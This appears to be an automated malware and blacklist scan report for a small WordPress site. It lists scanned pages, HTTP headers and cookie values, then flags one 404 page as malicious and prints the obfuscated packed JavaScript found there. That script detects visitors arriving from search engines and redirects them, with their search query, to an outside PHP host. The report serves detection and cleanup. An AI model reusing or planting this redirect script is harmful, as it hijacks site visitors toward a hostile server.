Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=volkan-civelek.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://volkan-civelek.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://volkan-civelek.net/ | 200 OK Content-Length: 4671 Content-Type: text/html | clean |
http://volkan-civelek.net/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://volkan-civelek.net/wp-content/plugins/fckeditor-for-wordpress-plugin/ckeditor/ckeditor.js?ver=3.3.1 | 200 OK Content-Length: 268148 Content-Type: application/x-javascript | clean |
http://volkan-civelek.net/wp-content/plugins/sexybookmarks/js/sexy-bookmarks-public.min.js?ver=4.0.6.2 | 200 OK Content-Length: 1826 Content-Type: application/javascript | clean |
http://volkan-civelek.net/wp-content/plugins/sexybookmarks/js/shareaholic-perf.min.js?ver=4.0.6.2 | 200 OK Content-Length: 615 Content-Type: application/javascript | clean |
http://volkan-civelek.net/wp-content/plugins/140follow/140follow.js | 200 OK Content-Length: 1592 Content-Type: application/javascript | clean |
http://volkan-civelek.net/uber-mich-now/ | 200 OK Content-Length: 8311 Content-Type: text/html | clean |
http://volkan-civelek.net/kontakt/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 17:53:02 GMT Pragma: no-cache Location: http://volkan-civelek.net/homeside/herz-und-mentalcoaching/kontakt/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 01 Oct 2014 17:53:02 GMT Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395582%7C4994ee76f7b1fbb180784061f6f7ae3b; expires=Wed, 15-Oct-2014 17:53:02 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395582%7C4994ee76f7b1fbb180784061f6f7ae3b; expires=Wed, 15-Oct-2014 17:53:02 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395582%7C1db9f67ea0e6ffd3a1824f544b3f42bf; expires=Wed, 15-Oct-2014 17:53:02 GMT; path=/; httponly X-Pingback: http://volkan-civelek.net/xmlrpc.php | clean |
http://volkan-civelek.net/homeside/herz-und-mentalcoaching/kontakt/ | 200 OK Content-Length: 5276 Content-Type: text/html | clean |
http://volkan-civelek.net/impressum-2/ | 200 OK Content-Length: 10144 Content-Type: text/html | clean |
http://volkan-civelek.net/rechtliche-hinweise/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 01 Oct 2014 17:53:06 GMT Pragma: no-cache Location: http://volkan-civelek.net/homeside/herz-und-mentalcoaching/kontakt/rechtliche-hinweise/ Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Wed, 01 Oct 2014 17:53:06 GMT Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395586%7Caad034ca6df6423594872265500d4d8f; expires=Wed, 15-Oct-2014 17:53:06 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395586%7Caad034ca6df6423594872265500d4d8f; expires=Wed, 15-Oct-2014 17:53:06 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395586%7C31686fad348e5f54276ad33d4a49c45e; expires=Wed, 15-Oct-2014 17:53:06 GMT; path=/; httponly X-Pingback: http://volkan-civelek.net/xmlrpc.php | clean |
http://volkan-civelek.net/homeside/herz-und-mentalcoaching/kontakt/rechtliche-hinweise/ | 200 OK Content-Length: 5085 Content-Type: text/html | clean |
http://volkan-civelek.net/test404page.js | 404 Not Found Content-Length: 6867 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: volkan-civelek.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:52:54 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccd4aca5208f5d1fc554fff59e6424f45; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccd4aca5208f5d1fc554fff59e6424f45; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccb2050c7fcb58c2f9bdddec619d5c63f; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/; httponly
X-Pingback: http://volkan-civelek.net/xmlrpc.php
GET / HTTP/1.1
Host: volkan-civelek.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:52:54 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccd4aca5208f5d1fc554fff59e6424f45; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccd4aca5208f5d1fc554fff59e6424f45; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_97dd76d2c3962f5296ae16d63f14bb41=%7C1413395574%7Ccb2050c7fcb58c2f9bdddec619d5c63f; expires=Wed, 15-Oct-2014 17:52:54 GMT; path=/; httponly
X-Pingback: http://volkan-civelek.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: volkan-civelek.net
Referer: http://www.google.com/search?q=volkan-civelek.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: volkan-civelek.net
Referer: http://www.google.com/search?q=volkan-civelek.net
Result:
The result is similar to the first query. There are no suspicious redirects found.